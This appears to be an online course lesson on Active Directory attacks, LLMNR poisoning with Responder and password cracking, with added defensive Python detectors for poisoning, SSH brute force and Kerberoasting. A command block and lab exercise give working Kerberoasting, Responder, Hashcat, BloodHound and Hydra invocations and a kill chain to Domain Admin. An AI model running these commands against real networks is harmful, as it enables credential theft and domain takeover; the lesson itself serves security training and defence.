Day 03 Exploitation

Exploitation with Metasploit

Metasploit modules, payloads, and the post-exploitation sequence — from initial access to privilege escalation to lateral movement in a legal lab environment.

~1 hour · Intermediate · Hands-on · Precision AI Academy

01. Active Directory Attacks

Active Directory (AD) is the backbone of Windows enterprise networks. Common attacks: AS-REP Roasting (targets accounts with Kerberos pre-authentication disabled, whose AS-REP can be cracked offline), Kerberoasting (requesting service tickets for accounts with SPNs and cracking the ticket hashes offline), Pass-the-Hash (authenticating with a captured NTLM hash instead of the plaintext password), and BloodHound (graphing AD relationships to visualize attack paths). Impacket is a Python library and tool collection that implements the protocol work behind all of these.

02. Man-in-the-Middle with Responder

Responder poisons LLMNR, NBT-NS, and mDNS requests on a LAN, answering them so that Windows hosts authenticate to the attacker's machine and hand over their NetNTLMv2 challenge-response hashes automatically. Combined with Hashcat, you can crack weak passwords and use them for lateral movement. This attack works passively — just run Responder and wait: Windows falls back to these multicast protocols whenever DNS cannot resolve a name (a mistyped share path or a stale hostname is enough), so no exploit is needed.
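The defender's counterpart to the attack above is a canary probe: ask the LAN, over LLMNR, for a hostname that nobody legitimately owns, and treat any answer as a poisoner. This is an added example written for this page, not Responder's code or anything from the course; it builds and parses RFC 4795 LLMNR messages (the wire format is the same as DNS) and includes a constructed reply byte string, labelled as such, so the parser can be exercised offline. The `probe()` function sends one real multicast query and is the only part that touches the network.

```python
"""LLMNR poisoning canary probe (added example, not part of the course).

A query for a random name like "canary-7f3a" should go unanswered on a
healthy LAN.  A host that answers it is claiming names it does not own,
which is exactly what an LLMNR/NBT-NS poisoner does.
"""
import os
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # IPv4 LLMNR multicast group (RFC 4795)
LLMNR_PORT = 5355


def build_query(name, txid):
    """Build an LLMNR A-record query: DNS-style header + one question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)   # id, flags, QD, AN, NS, AR
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE A, QCLASS IN


def _read_name(data, offset):
    """Read a (possibly compressed) name; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                       # compression pointer
            if end is None:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("pointer loop")
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def parse_response(data, expected_txid):
    """Return the IPv4 addresses from A answers, or [] if this is not a reply to our query."""
    try:
        txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
        if txid != expected_txid or not flags & 0x8000:   # must match our id and have QR=1
            return []
        offset = 12
        for _ in range(qdcount):                          # skip echoed question(s)
            _, offset = _read_name(data, offset)
            offset += 4
        answers = []
        for _ in range(ancount):
            _, offset = _read_name(data, offset)
            rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
            offset += 10
            rdata = data[offset:offset + rdlen]
            offset += rdlen
            if rtype == 1 and rdlen == 4:
                answers.append(socket.inet_ntoa(rdata))
        return answers
    except (struct.error, IndexError, ValueError, UnicodeDecodeError):
        return []


def probe(timeout=2.0):
    """Send one canary query; return [(source_ip, [answer_ips]), ...] for every host that answers."""
    name = "canary-" + os.urandom(4).hex()
    txid = random.randrange(1, 0xFFFF)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)   # stay on the local link
    sock.settimeout(timeout)
    responders = []
    try:
        sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:                      # collect until the timeout fires
            data, (src_ip, _port) = sock.recvfrom(1024)
            answers = parse_response(data, txid)
            if answers:
                responders.append((src_ip, answers))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return responders


# Constructed reply (not a real capture): a poisoner at 192.168.1.55 answering
# the canary query with transaction id 0x1234.
CONSTRUCTED_REPLY = (
    b"\x12\x34\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00"     # id 0x1234, QR=1, 1 question, 1 answer
    b"\x0bcanary-7f3a\x00\x00\x01\x00\x01"                  # echoed question: A, IN
    b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04"      # name ptr to offset 12, A, IN, TTL 30, rdlen 4
    b"\xc0\xa8\x01\x37"                                      # 192.168.1.55
)

if __name__ == "__main__":
    print(parse_response(CONSTRUCTED_REPLY, 0x1234))   # offline check against the constructed reply
    print(probe())                                      # live check on the local LAN
```

Run `probe()` from a workstation on the segment you are defending; a non-empty result names the poisoner's address. The durable fix is to turn the fallback off: the "Turn off multicast name resolution" policy under Computer Configuration > Administrative Templates > Network > DNS Client disables LLMNR, and NBT-NS is disabled per adapter in the WINS tab of the IPv4 settings.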

03. Password Attacks

Dictionary attacks use wordlists (rockyou.txt has 14M passwords). Rule-based attacks apply transformations (append numbers, capitalize first letter). Hashcat supports GPU acceleration — an RTX 3080 cracks 40+ billion MD5 hashes per second. Hydra and Medusa brute-force network services: SSH, RDP, SMB, FTP, web login forms.
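On the receiving end, a Hydra run against SSH looks like a burst of failed logins from one source followed, if the wordlist wins, by a successful one. The detector below is an added example for this page, not code from Hydra, Hashcat or the course: it parses constructed sshd `auth.log` lines (syslog timestamps, with 2024 assumed as the year since syslog omits it), flags any source that fails five or more times inside a sixty-second sliding window, and separately flags an accepted login from a source that was already flagged, which is the case worth paging someone for.

```python
"""SSH brute-force detection over sshd auth.log lines (added example, not part of the course)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)
FAIL_THRESHOLD = 5                 # failures from one source ...
WINDOW = timedelta(seconds=60)     # ... inside this sliding window
ASSUMED_YEAR = 2024                # syslog lines carry no year

# Constructed sample log: a wordlist run from 192.168.1.50 that eventually
# succeeds, plus ordinary noise from two other hosts.
SAMPLE_LOG = """\
May  1 09:00:01 bastion sshd[1201]: Failed password for admin from 192.168.1.50 port 51000 ssh2
May  1 09:00:03 bastion sshd[1203]: Failed password for admin from 192.168.1.50 port 51001 ssh2
May  1 09:00:05 bastion sshd[1205]: Failed password for invalid user root from 192.168.1.50 port 51002 ssh2
May  1 09:00:07 bastion sshd[1207]: Failed password for admin from 192.168.1.50 port 51003 ssh2
May  1 09:00:09 bastion sshd[1209]: Failed password for admin from 192.168.1.50 port 51004 ssh2
May  1 09:00:11 bastion sshd[1211]: Failed password for admin from 192.168.1.50 port 51005 ssh2
May  1 09:00:40 bastion sshd[1250]: Accepted password for admin from 192.168.1.50 port 51040 ssh2
May  1 09:02:00 bastion sshd[1301]: Failed password for dave from 10.0.0.7 port 40000 ssh2
May  1 09:05:00 bastion sshd[1302]: Failed password for dave from 10.0.0.7 port 40001 ssh2
May  1 09:05:30 bastion sshd[1303]: Accepted publickey for dave from 10.0.0.8 port 40002 ssh2
"""


def parse_line(line, year=ASSUMED_YEAR):
    """Return a dict with ts/result/method/user/ip, or None for lines we do not care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S").replace(year=year)
    return ev


def detect(log_text):
    """Sliding-window failure count per source IP, plus success-after-burst."""
    failures = defaultdict(deque)      # ip -> timestamps of recent failures
    brute_force = {}                   # ip -> details recorded when the threshold was crossed
    success_after_burst = []           # (ip, user) logins accepted from an already-flagged source
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["result"] == "Failed":
            window = failures[ip]
            window.append(ts)
            while window and ts - window[0] > WINDOW:   # drop failures older than WINDOW
                window.popleft()
            if len(window) >= FAIL_THRESHOLD and ip not in brute_force:
                brute_force[ip] = {"first_seen": window[0].isoformat(), "failures": len(window)}
        elif ip in brute_force:
            success_after_burst.append((ip, ev["user"]))
    return {"brute_force": brute_force, "success_after_burst": success_after_burst}


if __name__ == "__main__":
    for key, value in detect(SAMPLE_LOG).items():
        print(key, value)
```

Point it at a real file with `detect(open("/var/log/auth.log").read())`. The thresholds are the tuning knobs: five failures a minute catches an online wordlist attack without firing on a user who fat-fingers a password, and the same logic is what fail2ban implements before banning the source. Key-only authentication removes the password guessing surface entirely.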

```bash
# Kerberoasting with Impacket: request TGS tickets for every account with an SPN
GetUserSPNs.py -request -dc-ip 192.168.1.10 DOMAIN/user:password

# Crack Kerberos tickets with Hashcat (mode 13100 = Kerberos 5 TGS-REP etype 23)
hashcat -m 13100 krb5tgs.hash /usr/share/wordlists/rockyou.txt

# Responder on LAN interface
responder -I eth0 -rdwv

# Crack captured NetNTLMv2 hashes (mode 5600)
hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt

# BloodHound data collection (run on a domain-joined Windows host)
SharpHound.exe -c All
# Then import the resulting .zip into the BloodHound GUI

# Hydra SSH brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
  ssh://192.168.1.100
```

Tip: Run Responder only during business hours when users are actively browsing — you need live systems making name resolution requests. Passive hash capture requires victim activity.
Day 3 Exercise: Kerberoast a Lab AD Environment

  1. Set up a Windows Server 2019 evaluation VM and configure Active Directory
  2. Create 2 service accounts with SPNs (setspn -A http/svc01 domain\svcaccount)
  3. Run GetUserSPNs.py to request and capture service tickets
  4. Crack the tickets with Hashcat using the rockyou.txt wordlist
  5. Map the attack path in BloodHound using SharpHound data collection
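The same lab is a good place to see what Kerberoasting and AS-REP Roasting (section 01 above) look like from the domain controller's side. The detector below is an added example written for this page, not course code and not an Impacket or Microsoft component: it runs over constructed event records shaped like the fields a SIEM pulls from Security Event ID 4769 (service ticket requested) and 4768 (TGT requested). The field names `user`, `service`, `etype`, `preauth` and `status` are assumptions standing in for the real event XML. It flags a principal that requests RC4 tickets for several user-account SPNs in a short window, and any TGT issued without pre-authentication. Step 3 of the exercise should produce exactly the first pattern on the DC.

```python
"""Kerberoasting / AS-REP Roasting detection over Windows Security events.

Added example, not part of the course.  Events are constructed dicts; the
field names are assumptions modelled on the 4769 / 4768 event fields.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"               # TicketEncryptionType for RC4-HMAC: the crackable case
                                # (hashcat 13100 for TGS-REP, 18200 for AS-REP)
WINDOW = timedelta(minutes=5)
SPN_THRESHOLD = 3               # distinct service accounts one principal requests inside WINDOW

# Constructed sample events. svc01/svc02 are the lab's SPN accounts from step 2;
# 0x12 is AES256, which a cracker cannot use at useful speed.
EVENTS = [
    {"id": 4769, "time": "2024-05-01T09:00:01", "user": "alice@LAB.LOCAL", "service": "svc01",  "etype": "0x17", "status": "0x0"},
    {"id": 4769, "time": "2024-05-01T09:00:02", "user": "alice@LAB.LOCAL", "service": "svc02",  "etype": "0x17", "status": "0x0"},
    {"id": 4769, "time": "2024-05-01T09:00:03", "user": "alice@LAB.LOCAL", "service": "sqlsvc", "etype": "0x17", "status": "0x0"},
    {"id": 4769, "time": "2024-05-01T09:05:00", "user": "bob@LAB.LOCAL",   "service": "WS01$",  "etype": "0x12", "status": "0x0"},
    {"id": 4769, "time": "2024-05-01T09:06:00", "user": "bob@LAB.LOCAL",   "service": "krbtgt", "etype": "0x12", "status": "0x0"},
    {"id": 4768, "time": "2024-05-01T09:07:00", "user": "legacy.user",     "etype": "0x17", "preauth": "0", "status": "0x0"},
    {"id": 4768, "time": "2024-05-01T09:08:00", "user": "carol",           "etype": "0x12", "preauth": "2", "status": "0x0"},
]


def is_roastable_tgs(ev):
    """4769 for a user-account SPN, issued successfully with an RC4 ticket."""
    return (ev["id"] == 4769
            and ev["status"] == "0x0"
            and ev["etype"] == RC4_HMAC
            and ev["service"].lower() != "krbtgt"        # every TGT renewal names krbtgt; not a roast
            and not ev["service"].endswith("$"))         # machine accounts have long random passwords


def is_asrep_roast(ev):
    """4768 with Pre-Authentication Type 0 (logon without pre-auth) and an RC4 ticket."""
    return (ev["id"] == 4768
            and ev["status"] == "0x0"
            and ev.get("preauth") == "0"
            and ev["etype"] == RC4_HMAC)


def detect(events):
    """Return {"kerberoast": {user: [services]}, "asrep_roast": [users]}."""
    findings = {"kerberoast": {}, "asrep_roast": []}
    per_user = defaultdict(list)
    for ev in events:
        if is_roastable_tgs(ev):
            per_user[ev["user"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
        elif is_asrep_roast(ev):
            findings["asrep_roast"].append(ev["user"])
    for user, requests in per_user.items():
        requests.sort()
        for i, (t0, _svc) in enumerate(requests):
            # all distinct SPNs this user asked for within WINDOW of request i
            services = {svc for t, svc in requests[i:] if t - t0 <= WINDOW}
            if len(services) >= SPN_THRESHOLD:
                findings["kerberoast"][user] = sorted(services)
                break
    return findings


if __name__ == "__main__":
    print(detect(EVENTS))
```

4769 only appears if "Audit Kerberos Service Ticket Operations" is enabled on the DC (4768 needs "Audit Kerberos Authentication Service"). On the hardening side, the same checks tell you what to fix: service accounts configured for AES-only encryption or moved to group Managed Service Accounts take the RC4 ticket away from the cracker, and re-enabling pre-authentication on the `legacy.user`-style accounts removes the AS-REP case.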

Day 3 Summary

Challenge

Set up a two-machine AD lab (DC + workstation) and complete a full kill chain: Responder hash capture → Hashcat crack → SMB login → BloodHound enumeration → escalate to Domain Admin.

What's Next

The foundations from today carry directly into Day 4. In the next session the focus shifts to Web Application Penetration Testing — building directly on everything covered here.

Day 3 Checkpoint

Before moving on, verify you can answer these without looking:

  • What is the core concept introduced in this lesson, and why does it matter?
  • What are the two or three most common mistakes practitioners make with this topic?
  • Can you explain the key code pattern from this lesson to a colleague in plain language?
  • What would break first if you skipped the safeguards or best practices described here?
  • How does today's topic connect to what comes in Day 4?

Live Bootcamp

Learn this in person — 2 days, 5 cities

Thu–Fri sessions in Denver, Los Angeles, New York, Chicago, and Dallas. $1,490 per seat. June–October 2026.
